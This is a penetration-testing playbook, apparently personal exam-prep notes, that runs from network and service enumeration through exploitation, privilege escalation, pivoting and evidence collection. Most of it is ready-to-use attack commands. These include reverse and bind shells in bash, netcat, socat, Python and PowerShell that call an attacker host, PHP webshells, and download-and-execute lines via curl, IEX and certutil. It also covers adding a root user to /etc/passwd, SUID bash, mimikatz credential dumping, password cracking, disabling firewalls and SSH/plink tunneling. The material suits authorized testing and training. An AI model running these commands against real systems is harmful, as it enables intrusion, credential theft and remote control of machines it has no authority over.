Penetration Test Playbook

Passive Information Gathering

Active Information Gathering

Network-wide Enumeration

What have we got from our network-wide enumeration (if applicable)?

cd network_enumeration
for file in $(ls .); do cat $file | grep '<new victim IP or hostname or user>'; done

Manually check for reverse lookups e.g. host <victim IP>

Other Boxes?

What have we got from breaking into other boxes on the network (if applicable)?

cd box_enumeration
for file in $(ls .); do cat $file | grep '<new victim IP or hostname or user>'; done

Automate it

sudo ~/Documents/tools/nmapAutomator/nmapAutomator.sh --type All --host <victim IP address>
cd 01_autorecon/scans/
for file in $(ls); do cat $file; done

python3 ~/Documents/tools/AutoRecon/src/autorecon/autorecon.py <victim IP address>
cd 01_nmapautomator/<nmap OR recon>/
for file in $(ls); do cat $file; done

Quick Nmap Scan

sudo nmap --top-ports 20 --open <victim IP>

Quick Nmap UDP Scan

sudo nmap -sU --top-ports 20 --open <victim IP>

Heavyish Nmap Scan

sudo nmap <victim IP> -p- -sT --reason
sudo nmap <victim IP> -p <ports you've found that are open> -sV --reason
sudo nmap -sS -sV -A -O -p <ports that you've found are open> <IP address>
sudo nmap -sS -sV -A -O -p- <IP address>

Other Nmap Scans

nmap -vv --reason -Pn -sV -sC --version-all -oN <victim IP>
nmap -vv --reason -Pn -A --osscan-guess --version-all -p- <victim IP>

Nmap NSE Scripts

Find some relelvant NSE scripts with

ls -al /usr/share/nmap/scripts/ | grep <service>

then scan with

sudo nmap <victim IP> --script=<script found above>

also check for script arguments to run things properly:

for script in $(ls /usr/share/nmap/scripts/ | grep <service>); do nmap --script-help $script; done

53 DNS

Set up your machine for the environment:

sudo nmap -sS -sV -A -p 53 10.11.1.0/24 -oG 01_dns_enum.txt
cat 01_dns_enum.txt | grep -i open | cut -d ' ' -f 2 > 01_dns_servers.txt

then edit /etc/resolv.conf to use em e.g. add lines like the following: nameserver 10.11.1.20

Find DNS Servers

host -t mx google.com
host -t txt google.com
dnsenum google.com
dnsrecon -d google.com -t axfr

DNS Zone Transfer

host -l <domain name> <dns server address>

80, 8080 HTTP, 443 HTTPS, 8009 Apache Tomcat / Jserv

nmap -vv --reason -Pn -sV -p 80 --script="banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)" <victim IP>

If port 80 or 443 are open - visit it in a browser, curl -i <victim IP>, curl -i -L <victim IP>, view source, inspect element, elements supporting user interaction, cookies being set, URL manipulation, directory traversal

curl <victim IP address>/robots.txt -s | html2text

View robots.txt as a Search Engine:

curl --user-agent "Googlebot/2.1 (+http://www.googlebot.com/bot.html)" http://<victim IP address>/robots.txt

See AutoRecon and NmapAutomator output.

SSL Enumeration:

sslscan <victim IP>
curl -v '<url>'
curl -v '<url>' --insecure

Web Application Scanning:

gobuster dir -u <IP address> -w <wordlist>
dirb http://<domain or IP address> <wordlist>

Are there any other wordlists we should look at trying based on gobuster or dirb results?

ls -al /usr/share/wordlists/SecLists/Discovery/Web_Content/
ls -al /usr/share/wordlists/dirb/
dirb http://10.11.1.71 /usr/share/wordlists/SecLists/Discovery/WebContent/CGIs.txt -N 302
gobuster dir -u <IP address> -w /usr/share/wordlists/SecLists/Discovery/Web-Content/IIS.fuzz.txt

Remember that gobuster doesn't recursively search, dirb does by default, if you're not finding anything useful, kick off the slower boi

nikto -h <IP address>

wpscan --url <domain> --enumerate ap,at,cb,dbe

nmap -sV --script ajp-auth,ajp-headers,ajp-methods,ajp-request -n -p 8009 <victim IP address>

22 SSH, 3389 RDP, 5900 VNC

ls -lh /usr/share/nmap/scripts/*<service>*

nmap 10.11.1.71 -p 22 -sV --script=ssh-hostkey

nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 <victim IP address>

Sometimes need -Pn

Attempt in connect to open ports using ssh, rdesktop, telnet, nc, ftp, smbclient, etc. - can you interact at all, is authentication required, is there further version information or fingerprints or keys or domains etc. provided back, is there a README.md, is there a robots.txt?

rdesktop -u <username> <victim IP address>

139 NetBios SSN, 445 SMB

sudo nmap -sV -sS -p 139,445 --script=smb-os-discovery <IP address>
sudo nmap -sV -sS -p 139,445 --script=smb-enum* <IP address>
sudo nmap -sV -sS -p 139,445 --script=smb-vuln* <IP address>
nmap --script smb-vuln-cve-2017-7494 --script-args smb-vuln-cve-2017-7494.check-version -p445 <victim IP>
sudo nbtscan <IP address>
sudo enum4linux -a <IP address>
smbmap -H <victim IP>

Not getting the version out of Nmap? Set up Wireshark to capture a connection to a guest session, then inspect the packet called Session Setup AndX Response, you should get a field called Native LAN Manager which has a version number in there.

Or, also if you aren't getting a version, in one terminal type this: sudo ngrep -i -d tun0 's.?a.?m.?b.?a.*[[:digit:]]' port 139, and in a second window: smbmap -H 10.11.1.115 -u '' -p '' -P 139, then go back to the first one to see what you're capturing, a version should pop.

smbclient //<victim IP address>/<share name>
smbclient -L <name of server>

Logging in using Guest account:

smbclient //<victim IP address>/<share folder> -U" "%" "
smbclient "//<victim IP address>/<share name> -U guest%
smbclient -L \\<victim IP address>
smbmap -H <victim IP address> -u '' -p '' -P 139

Enumerate a DC: add a line to /etc/hosts resolving the IP to the domain name, then run Nmap scans against the domain name.

Enumerate Usernames of DC: make sure your domain is resolved nicely in /etc/hosts then run ./kerbrute userenum --dc thedomain.local -d thedomain.local <wordlist>

25 SMTP, 110 POP3, 995 POP3S, 143 IMAP, 993 IMAPS

sudo nmap <victim IP> -sV -p 25 --script smtp*
sudo nmap <victim IP> -sV -p 110 --script pop*

Enumerate users by connecting via telnet <victim IP> 25 and running command VRFY <user> or EXPN, test for mail, daemon, root, backup, and other user names found through other enumeration techniques, or by using nc with the -c option to fix line endings

111 RPCBind, 135 MSRPC, 1025 MSRPC, 2049 NFS

sudo nmap -sV -p 111 --script=rpcinfo <IP address>
sudo nmap -sV -sS -p 111 --script nfs* <IP address>
sudo nmap -sV -p 135 --script=msrpc-enum <victim IP address>
rpcinfo -s <victim IP address>

Show mounting information for an NFS server: showmount -a <victim IP address>

Mount a NFS share on Kali: sudo mkdir /var/<share name>, sudo mount -t nfs <victim IP address>/<share name> /var/<share name>, to verify it mounted successfully use with mount or df -h

Unmount a NFS share on Kali: use either of the following: umount <victim IP address>:<share name> OR umount /var/<share name>, if it doesn't detach because it's in use, use fuser -m MOUNT_POINT to see which processes are using it, and if you still have trouble you can use the --lazy option to unmount a busy file system as soon as it's not busy anymore: umount -l MOUNT_POINT

21 FTP

sudo nmap -p 21 -sV --script=ftp-anon,ftp-libopie,ftp-proftpd-backdoor,ftp-syst,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221,tftp-enum <victim IP address>

If anonymous log in is allowed: ftp <victim IP> with user anonymous and any password, and make sure to set transfer mode using binary so any binary files getting uploaded don't get mangled.

Common Useful Commands

help
pwd
ls
get <filename>
put <filename>

1433 MS-SQL, 3306 MySQL

nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 <victim IP address>

sqsh -S <victim IP address> -U sa -P <password>, then go see MS SQL xp_cmdshell card for setting it up if not configured.

161 SNMP

sudo nmap -sU --open -p 161 <IP address>
onesixtyone -c community -i <IP address>
snmpwalk -c <public, private, manager> -v1 <IP address>

Exploitation

Using Public Exploits

Finish your enumeration above, write-up version numbers, be thorough

searchsploit <term> --exclude="(PoC)|/dos/"

Google all the versions and any CVE's etc. that came up during enumeration.

Find any named vulnerabilities or services to search for Nmap scripts for to confirm your victim is vulnerable? Find any POCs out in the internet for those vulnerabilities to throw?

Are there any Nmap scripts for named vulns you've found? ls -lah /usr/share/nmap/scripts/*<vuln name e.g. shellshock>*

Check how recent the public exploits are, pick the most recent one, if there's old libraries see if you can port them to new ones.

Finding exploits - starting with services and applications running before moving on to operating system and kernel exploits - searchsploit <keywords> --exclude='/dos/', searchsploit -x <exploit code>

Prepare Virtual Environment for Exploitation:

python3 -m venv virtual-env-name
virtualenv -p /usr/bin/python2.7 virtual-env-name

Avoiding SSL and SelfSignedCerts in Python:

import requests
res = requests.get(url, allow_redirects=False, verify=False)
print(res.status_code)

Compile Linux 32-bit Binary on 64-bit Kali:

gcc -m32 exploit.c -o exploit

Compile Linux 64-bit Binary on 64-bit Kali:

gcc exploit.c -o exploit
gcc -Wl,--hash-style=both -m32 -Wall -o exploit exploit.c

Compile Windows 32-bit Binary on 64-bit Kali:

i686-w64-mingw32-gcc exploit.c -o exploit.exe -lws2_32
i686-w64-mingw32-gcc exploit.c -o exploit.exe

Compile Windows 64-bit Binary on 64-bit Kali:

i686-w64-mingw32-gcc exploit.c -o exploit.exe
x86_64-w64-mingw32-gcc exploit.c -o exploit.exe

Web Application Attacks

Did you find any admin consoles? admin:<blank>, admin:admin, admin:password, root:<blank>, root:root, root:password, username:username, admin:adminadmin, any users/passwords from other boxes that might have been reused?

Generate a lil wordlist based on a login page you've got to: cewl http://<url of login page> -w wordlist.txt

Is the application open source and hosted in some repository? Can we find default credentials / locations sensitive information is stored / identifiers for sensitive information we could grep around for?

XSS: < > ' " { } ;

Directory Traversal: ../, ..\

File Inclusion: http://domain/page.php?file=<do some things>

SQL Injection: ', or 1=1;#, or 1=1 LIMIT 1;#

Reviewing and manipulating network traffic with BurpSuite, tcpdump, and Wireshark

Client-Side Attacks

Passive Information Gathering: Google, Shodan, social media, forums to find information about externally facing infrastructure, operating systems of, browser types, versions, installed plugins, User-Agent strings.

Active Information Gathering: social engineering, client fingerprinting.

Leveraging HTML Applications (.hta)

Exploiting Microsoft Office.

General Shells

ls -al /usr/share/webshells/

Test payloads:

whoami
echo $USER && cat /etc/issue
phpinfo()

Powercat Reverse:

powercat -c <attacker IP> -p 443 -e cmd.exe, catch with sudo nc -lvp 443

Powercat Bind:

powercat -l -p 443 cmd.exe, connect to with nc <victim IP> 443

Powercat - generate encoded reverse shell, then send to attacker machine from victim:

powercat -c <attacker IP> -p 443 -e cmd.exe -ge > encoded_reverseshell.ps1
powershell.exe -E <Base64 encoded string stored in encoded_reverseshell.ps1>

General Shell Non-staged:

msfvenom -p windows/shell_reverse_tcp LHOST=<attacker machine> LPORT=443 -f exe -o shell_reverse.exe

General Shell Staged:

msfvenom -p windows/shell/reverse_tcp LHOST=<attacker machine> LPORT=443 -f exe -o shell_reverse.exe

Apache Tomcat / Java Application:

msfvenom -p java/shell_reverse_tcp LHOST=<attacker machine> LPORT=4444 -f war -o shell.war

PHP:

<?php passthru($_GET['cmd']);?>
<?php $sock=fsockopen("<controller IP address>",1234);exec("/bin/sh -i <&3 >&3 2>&3");?>

Get Shells with PHP:

<?php system("wget <attacker IP address>/shell.txt -O /tmp/shell.php; php /tmp/shell.php"); ?>

Python Reverse:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<attacker machine>",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Linux Shells

Bash Reverse:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <listener IP> <listener port> >/tmp/f
/bin/bash -i >& /dev/tcp/<listener IP>/443 0>&1

Netcat Reverse (Linux Victim):

# the shell
nc -nv <attacker IP> 1234 -e /bin/bash

# catch with 
sudo nc -nvlp 1234

Netcat Bind (Linux Victim):

# the shell
nc -nvlp 4444 -e /bin/bash

# connect to with 
nc -nv <victim IP> 4444

Socat Bind (Linux Victim):

# the shell
socat -d -d TCP4-LISTEN:4443 EXEC:/bin/bash

# connect to with 
socat - TCP4:<remote IP address>:4443

Socat Reverse (Linux Victim):

# the shell
socat TCP4:<remote IP address>:443 EXEC:/bin/bash

# catch it with 
socat -d -d TCP4-LISTEN:443 STDOUT

Get a more stable TTY with Socat: listen with first command, then send shell with:

socat file:<backtick>tty<backtick>,echo=0,raw tcp-listen:4444
./socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:<attacker IP address>:4444

Windows Shells

Running executables from Windows command prompt:

C:\Windows\System32\cmd.exe /c <enter executable / command here>
start <enter command / executable here>

Netcat Reverse (Windows Victim):

# the shell
ncat -nv <attacker IP> 4444 -e /mnt/c/Windows/system32/cmd.exe

# catch with 
sudo nc -nvlp 4444

Netcat Bind (Windows Victim):

# the shell
ncat -nvlp 4444 -e /mnt/c/Windows/system32/cmd.exe

# connect to with 
nc -nv <victim IP> 4444

Socat Reverse (Windows Victim):

# the shell
socat TCP4:<remote IP address>:4443 EXEC:'cmd.exe',pipes

# catch it with 
socat -d -d TCP4-LISTEN:443 STDOUT

Socat Bind (Windows Victim):

# the shell
socat -d -d TCP4-LISTEN:4443 EXEC:'cmd.exe',pipes

# connect to with 
socat - TCP4:<remote IP address>:4443

PowerShell Reverse:

powershell -c "$client = New-Object System.Net.Sockets.TCPClient('<attacker machine>',443);$stream = $client.GetStream();[byte[]]$bytes = 0..66535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush();};$client.Close()"

PowerShell Bind:

powershell -c "$listener = New-Object System.Net.Sockets.TcpListener('0.0.0.0',443);$listener.start();$client = $listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' +(pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();$listener.Stop()"

PowerShell Using nishang:

powershell iex (New-Object Net.WebClient).DownloadString('http://<attacker IP>/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress <attacker IP> -Port 1337

Post-Exploitation

Transferring Files

Transferring files with socat:

# serve it up with 
sudo socat TCP4-LISTEN:443,fork file:some_file.txt

# download it with 
socat TCP:<remote IP address>:443 file:some_file.txt,create

Transferring files by serving em up on HTTP:

python2 -m SimpleHTTPServer 8888
python3 -m http.server 7331

then use wget, curl --output, visit in a browser on your victim, or put your resource at /var/www/html run sudo systemctl start apache2 then use wget on your victim.

Transferring files with nc to Linux host:

# on attacker machine
sudo nc -q 5 -nvlp 80 < <some script>.sh 

# then on victim
/dev/tcp/<attacker machine>/80 | sh

Transferring files with nc to Linux host:

# on attacker machine
sudo nc -q 5 -nvlp 80 < <some script>.sh 

# then on victim
/dev/tcp/<attacker machine>/80 | sh

Execute from memory and send output back to the attacker:

nc -nvlp 9002 | tee output.out 

# then on victim 
curl <attacker machine>/<script to execute>.sh | sh | nc <attacker machine> 9002

Transferring files with SMB (note you have to serve these up as root on your machine, and use a Python virtual environment because you're gonna need Python 2 and the ImPacket library):

# on attacking machine: 
smbserver.py a /usr/share/windows-binaries/

# on victim machine: 
\\<attacker IP>\a\whoami.exe

Transferring files with ftp: ftp <victim IP>, binary to set binary mode if you're transferring executables, just in case it's in ASCII mode and wrecks the file, put <file name on attacker machine>, also use to transfer files from victim to attacker machine, if FTP is around, using ftp <attacker IP>, and the user:password of offsec:offsec

Transferring Files with certutil:

certutil.exe -urlcache -split -f http://<attacker machine>/<file to transfer>

Checking file integrity after upload:

powershell get-filehash -Algorithm MD5 <file name> or md5sum <file name>

Download file to disk with PowerShell:

powershell -c "(new-object System.Net.WebClient).DownloadFile('http://<attacker IP address>/wget.exe','C:\Users\offsec\Desktop\wget.exe')"

Run file in memory with PowerShell:

powershell.exe IEX (New-Object System.Net.WebClient).DownloadString('http://<attacker IP address>/helloworld.ps1')

General Privilege Escalation

Non-interactive to Interactive:

python -c 'import pty; pty.spawn("/bin/bash")'

Enumeration and Finding Exploits - starting with services and applications running before moving on to operating system and kernel exploits:

searchsploit <keywords> --exclude='/dos/'
searchsploit -x <exploit code>

Own /bin/bash: chmod +s /bin/bash /bin/bash -p

UDF in MySQL: select do_system('cp /bin/bash /tmp/rootbash; chmod +s /tmp/rootbash'); then from local shell run /tmp/rootbash -p

Enumerating Linux for Privilege Escalation

Is your shell interactive - su, what kind of shell is it - echo $SHELL, do you need to fix your PATH? Fix PATH if you need to:

export PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/bin:/sbin:/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:

whereis perl
whereis python
whereis nc
whereis nmap

Utilise Nmap: sudo nmap --interactive, !sh

cp /bin/bash /tmp/rootbash
chmod +s /tmp/rootbash
/tmp/rootbash -p

Automating Enumeration and Privilege Escalation: LinEnum, Linux Smart Enumeration lse.sh, unix-privesc-check

View real, effective, and saved user and group IDs:

id
cat /proc/$$/status | grep "[UG]id"

More info about the box:

hostname
cat /etc/issue
cat /etc/*-release
uname -a
uname -i
ip a
ifconfig
lsb_release -a

Running Processes:

ps axu
ps aux | grep "^root"
<program> --version
<program> -v
dpkg -l | grep <program>
rpm -qa | grep <program>

Can we use sudo?

sudo <program>
sudo -u <username> <program>
sudo -l
sudo -s
sudo -i
sudo /bin/bash
sudo passwd

Anything useful in GTFOBins? Any config files hanging around with passwords in em? Any SSH keys hanging around?

Current user information:

whoami
echo %username%
id
who
pwd
last
cat ~/<.bash_profile
.bashrc
.bash_logout>
cat /etc/<profile
bashrc>
env
set
cat ~/.*history | less

Is /etc/shadow readable?

head -n 1 /etc/shadow
echo '<hash from above command>' > hash.txt
john --format=sha512crypt --wordlist=rockyou.txt hash.txt

Is /etc/shadow modifiable?

cat /etc/shadow > etc_shadow_backup.txt
mkpasswd -m sha-512 newpassword
vim /etc/shadow

Is /etc/passwd modifiable? Make a new root user if you find you can write to /etc/passwd:

# generate password with 
openssl passwd evil 

# then 
echo "root2:<generated openssl hash>:0:0:root:/bin/bash" >> /etc/passwd"

# then log in with 
su root2

Looking for readable backup files:

ls -al /
ls -al /home/user
ls -al /tmp
ls -al /var/backups

Found a readable private SSH key? Download root_key to local machine then:

chmod 600 root_key
ssh -i root_key root@<victim machine>

Find SUID Binaries:

find / -perm -4000 -type f -exec ls -la {} 2>/dev/null \;
find / -uid 0 -perm -4000 -type f 2>/dev/null

# find SUID and SGID 
find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null

Find all writeable files in /etc:

find /etc -maxdepth 1 -writable -type f 2> /dev/null

Find all readable files in /etc:

find /etc -maxdepth 1 -readable -type f 2> /dev/null

Find Writeable Files:

find / -writable ! -user <whoami> -type f ! -path "/proc/*" ! -path "/sys/*" -exec ls -al {} \; 2>/dev/null
find / -perm -2 -type f 2>/dev/null
find / ! -path "*/proc/*" -perm -2 -type f -print 2>/dev/null

Find all directories which can be written to: find / -executable -writable -type d 2> /dev/null

Files Edited in Last 10 Minutes:

find / -mmin -10 2>/dev/null | grep -Ev "^/proc"

Who else uses the box:

cat /etc/passwd
cat /etc/sudoers
sudo -l grep -vE "nologin|false" /etc/passwd
grep -v '^#' /etc/ssh/sshd_config | uniq

Connectivity info, compare to port scan to see what's allowed through the firewall:

/sbin/route
netstat -atulpn
ss -anp
/etc/iptables
arp -e
chkconfig --list
grep 80 /etc/services

Environment variables - is LD_PRELOAD or LD_LIBRARY_PATH available in the PATH? Can we mess with what's in the PATH using cron jobs?

Finding programs that try to execute other programs:

strings /path/to/file
strace -v -f -e execve <command> 2>&1 | grep exec
ltrace <commad>

Investigate scheduled jobs:

crontab -l 
ls -alh /var/spool/cron; 
ls -al /etc/ | grep cron 
ls -al /etc/cron* 
cat /etc/cron* 
cat /etc/at.allow 
cat /etc/at.deny 
cat /etc/cron.allow 
cat /etc/cron.deny*
cat /etc/services
for dir in $( ls /etc/ | grep cron); do ls -al /etc/$dir; done

NFS:

# on target
cat /etc/exports
showmount-e 192.168.1.25

# locally on kali as root 
mkdir/tmp/nfs
mount -o rw,vers=2 192.168.1.25:/tmp/tmp/nfs
msfvenom-p linux/x86/exec CMD="/bin/bash -p" -f elf -o /tmp/nfs/shell.elf
chmod+xs/tmp/nfs/shell.elf

# and finally on target 
/tmp/shell.elf

What's installed:

dpkg -l
rpm -qa
lsmod
/sbin/modinfo <module>
ls -alh /usr/bin/
ls -alh /sbin/

Investigate services:

cat /etc/fstab | grep <service name>
service --status-all
ls /etc/init.d

What's in the web root?

Debian - /etc/apache2/

CentOS - /etc/httpd/

Find document root when just config is stored at the web root - grep -Ri DocumentRoot, often at /var/www/html/

Are any services misconfigured/have vulnerable plugins - cat /etc/*.conf, where can we write things - find / -writeable -type d 2>/dev/null

Passwords in memory: strings /dev/mem -n10 | grep -i PASS

Enumerating Windows for Privilege Escalation

Is your shell interactive, what kind of shell is it, do you need to fix your PATH, what tools are installed and available to you?

Automating Enumeration and Privilege Escalation: LovelyPotato, windows-privesc-check, JAWS, windows-exploit-suggester, Sherlock.ps1, Watson, Windows Exploit Suggestor Script

type
dir
del
net user test 1234 /add
net localgroup administrators test /add
cacls *.* /t /e /g domainname\administrator:f
netsh firewall set opmode disable

where perl
where python
where ncat
powershell $PSVersionTable

Current user information:

whoami
whoami /priv
whoami /groups
net user
net user <username>
net user <username> /domain
net accounts

More info about the box:

hostname
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"
mountvol
wmic qfe get Caption, Description, HotFixID, InstalledOn
wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE%
net share

Connectivity info - make sure to compare this to what you already know, are there more ports here that you couldn't see with your earlier scans:

ipconfig /all
route print
netstat -ano
netsh advfirewall show currentprofile
netsh advfirewall firewall show rule name=all

Default Writeable Folders:

C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
C:\Windows\System32\spool\drivers\color
C:\Windows\Tasks
C:\windows\tracing

Where is the web root? Windows ISS - C:\inetpub\wwwroot\

Finding Unquoted Paths:

wmic service get name,displayname,pathname,startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """

Processes running - tasklist /SVC

Regular jobs running:

schtasks /query /fo LIST /v
schtasks /query /fo LIST 2>nul | findstr TaskName

Check for Exploitable Services - using old version of accesschk.exe to circumvent to GUI prompt when running it:

.\accesschk.exe /accepteula -uwcqv "Authenticated Users" *
.\accesschk.exe /accepteula -ucqv <service name identified from first command>

What's installed:

wmic product get name, version, vendor, driverquery.exe /v /fo csv | ConvertFrom-CSV | Select-Object 'Display Name', 'Start Mode', Path, Get-WmiObject Win32_PnPSignedDriver | Select-Object DeviceName, DriverVersion, Manufacturer | Where-Object {$_.DeviceName -like "*VMware*"}
driverquery.exe /fo table

Where can we write things:

accesschk.exe -uws "Everyone" "C:\Program Files", powershell Get-ChildItem "C:\Program Files" -Recurse | Get-ACL | ?{_.AccessToString -match "Everyone\sAllow\s\sModify"}

Enumerating Active Directory: net user and PowerShell

Enable RDP:

reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0
netsh firewall set service remoteadmin enable
netsh firewall set service remotedesktop enable

Has Windows Auto-login Password been set? reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"

Active Directory Authentication Attacks: mimikatz.exe privilege::debug token::elevate sekurlsa::logonpasswords sekurlsa::tickets kerberos::list /export , klist, Invoke-Kerberoast.ps1, GetUserSPNs.ps1, Spray-Passwords.ps1, Pass the Hash, Overpass the Hash, Pass the Ticket, Generating Golden Tickets, Domain Controller Synchronisation

Port Forwarding and Tunneling

General Port Forwarding (Linux):

internet-connected victim facilitating attacker machine connecting to non-internet-connected victim - in /etc/rinetd.conf:

<internet-connected victim> 80 <non-internet-connected victim> 80
sudo service rinetd restart
ss -antp | grep "80"

so all traffic sent on port 80 to the internet-connected victim will be sent to the non-internet-connected victim.

General Remote Port Forwarding (Windows):

internet-connected victim facilitating attacker machine connecting to non-internet-connected victim - from our reverse shell, so running on the internet-connected victim to access a port not available through the firewall:

cmd.exe /c echo y | plink.exe -ssh -l kali -pw ilak -R <attacker>:1234:<internet-connected victim>:3306 <attacker>

we can now scan a port that was previously unviable to us:

sudo nmap -sT -sV 127.0.0.1 -p 1234

General Local Port Forwarding (Windows):

internet-connected victim facilitating attacker machine connecting to non-internet-connected victim - on the internet-connected victim:

plink.exe -N -L <internet-connected victim machine>:4444:<attacker machine>:443 kali@<attacker machine>

on the attacker machine: Make sure you PermitRootLogin (value yes in /etc/ssh/sshd_config) in your attacker machine first, and restart the SSH service sudo service ssh restart, then connect on your attacker machine to 127.0.0.1:443

SSH Local Port Forwarding:

sudo ssh -N -L <attacker IP>:445:<non-internet-connected victim IP>:445 <victim user>@<internet-connected victim>

if you're doing SMB make sure /etc/samba/smb.conf on your attacker machine has min protocol = SMB2 in it.

If for some reason, an exploit cannot run locally on the target machine, the port can be forwarded using SSH to your local machine:

ssh -R <local port>:127.0.0.1:<target port> <username>@<local machine>

SSH Remote Port Forwarding:

internet-connected victim facilitating attacker machine connecting to port on internet-connected victim that isn't allowed through the firewall - run on internet-connected Linux victim:

ssh -N -R <attacker machine>:2221:127.0.0.1:3306 <attacker user>@<attacker machine>,

now we can scan the originally unavailable port:

sudo nmap -sS -sV 127.0.0.1 -p -2221

SSH + SOCKS4 Dynamic Port Fowarding:

internet-connected victim facilitating attacker machine connecting to non-internet-connected victims - run on attacker machine:

sudo ssh -N -D 127.0.0.1:8080 <victim user>@<internet-connected victim>

configure SOCKS4 proxy in /etc/proxychains.conf: socks4 127.0.0.1 8080, and now run tools through it:

sudo proxychains nmap --top-ports=20 -sT -Pn <non-internet-connected victim>

Netsh Port Forwarding (Old Windows):

set up internet-connected victim to faciliate connection to a non-internet-connected victim

netsh interface portproxy add v4tov4 listenport=4455 listenaddress=<internet-connected victim> connectport=445 connectaddress=<non-internet-connected victim>

allow this kind of traffic to traverse internal firewall:

netsh advfirewall firewall add rule name="forward_port_rule" protocol=TCP dir=in localip=<internet-connected victim> localport=4455 action=allow

connect to non-internet-connected victim from attacker by connecting to relevant port on internet-connected victim:

smbclient -L <internet-connected victim> --port=4455 --user=Administrator

Collect Evidence

Linux

cat proof.txt 
cat local.txt 
ipconfig 
ip a
cat local.txt

Home Directories: ls -lahR /home/

Connections to other machines / internal networks:

netstat -antulp
/sbin/route/
ufw status numbered

Search for File Names:

find / -type f -name '*cred*'
find / -type f -name '*password*'
find / -type f -name '*key*'
find / -type f -name "*ssh*"

Secrets about other machines / internal networks: find / -type f -name '*secret*'

Search for File Contents: grep -Ri password - don't do this at /

Find thing owned by a specific user or group:

find / -group <group name>
find / -user <user name>

Any databases running here we want to get info out of?

dpkg -l | grep database
mysql -u<db user> -p<db user password> -e 'show databases;'

Investigate scheduled jobs for more interesting info: for dir in $( ls /etc/ | grep cron); do ls -al /etc/$dir; done

/etc/passwd /etc/shadow

Password Attacks: crackstation

hashid <hash>
unshadow passwd-file.txt shadow-file.txt > unshadowed.txt
john --rules --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt

Windows

type proof.txt 
type local.txt 
ipconfig
type network-secret.txt
type local.txt

Get Searchable Lists of all the Folders and Files:

tree c:\ > folders.txt
dir /s c:\ > files.txt